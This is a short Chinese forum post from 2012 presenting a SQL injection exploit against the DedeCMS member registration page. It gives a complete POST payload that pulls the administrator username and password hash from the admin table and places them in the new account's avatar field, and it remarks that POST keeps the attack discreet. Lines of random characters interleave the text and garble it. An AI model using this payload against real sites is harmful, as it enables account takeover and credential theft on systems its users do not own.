dedecms版本 20121122
& p8 c* j7 X* u- `+ T# W
0 p1 v8 x6 U6 X5 K& ?8 { P需要magic_quotes_gpc=Off9 z# g$ Z( j8 [$ o7 P
$ D: p% v# R- N, c) \0 d
应该是没有什么大危害的漏洞.
% w, x5 T# Q& \原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.. B3 j5 h% d7 B2 x0 {6 d" j+ Q
% K: \ _4 H# v+ t+ G; r- J) m是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.
# Y- a% Q: z8 Z* O. U2 w" hPOST提交以下数据,其实不用POST提交的,这样隐蔽点.9 B; K3 c# c5 {3 ~, }. j
9 [ @5 @' ]3 \
http:///de/member/reg_new.php
0 x0 q4 S* L3 |3 ~" n0 e k4 h5 g Z8 V
POST
4 e' g `2 _- E6 G3 n& D8 X9 C" \/ i7 f. b8 A
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=
+ ^4 n; N \7 D- N( _" h1 k+ B3 }& }. _# Q4 p/ a
成功注册后,头像处里面有好玩的信息.
1 U" A! @/ n4 c0 U9 _9 u8 S5 f9 W6 I3 M1 n
|
发表于 2012-12-5 10:03:32
收藏
支持
反对